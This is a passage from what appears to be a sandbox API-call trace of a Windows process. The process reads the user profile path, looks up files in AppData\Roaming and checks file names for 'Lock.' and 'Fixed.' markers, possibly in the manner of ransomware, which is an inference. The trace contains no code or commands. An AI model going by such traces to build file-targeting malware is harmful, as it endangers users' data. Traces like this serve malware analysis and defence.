cAlternateFileName="ENRHXC~1.RTF")) returned 0 [0198.451] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0198.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.451] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0198.452] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0198.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.452] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0198.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0198.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f1fe0 [0198.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/enrHxcENdtYHa.rtf", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\enrHxcENdtYHa.rtf", lpFilePart=0x8bf658*="enrHxcENdtYHa.rtf") returned 0x3f [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0198.455] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\enrHxcENdtYHa.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\enrhxcendtyha.rtf")) returned 0xffffffff [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.456] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0198.456] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.456] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0198.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fieUnO JbD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ieUnO JbD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eUnO JbD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UnO JbD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nO JbD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O JbD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" JbD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JbD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bD.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.457] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fieUnO JbD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ieUnO JbD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eUnO JbD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UnO JbD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nO JbD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O JbD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" JbD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JbD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bD.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.458] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0198.458] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0198.458] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0198.458] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0198.458] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.459] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0198.459] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.459] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.459] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.459] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.459] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/fieUnO JbD.odp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacb8550, ftCreationTime.dwHighDateTime=0x1d4c923, ftLastAccessTime.dwLowDateTime=0x29904190, ftLastAccessTime.dwHighDateTime=0x1d4cfbf, ftLastWriteTime.dwLowDateTime=0x29904190, ftLastWriteTime.dwHighDateTime=0x1d4cfbf, nFileSizeHigh=0x0, nFileSizeLow=0x182dd, dwReserved0=0x8ed0039, dwReserved1=0x13e29, cFileName="fieUnO JbD.odp", cAlternateFileName="FIEUNO~1.ODP")) returned 0xaa57a0 [0198.460] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.460] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0198.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.462] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.462] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0198.462] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.463] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 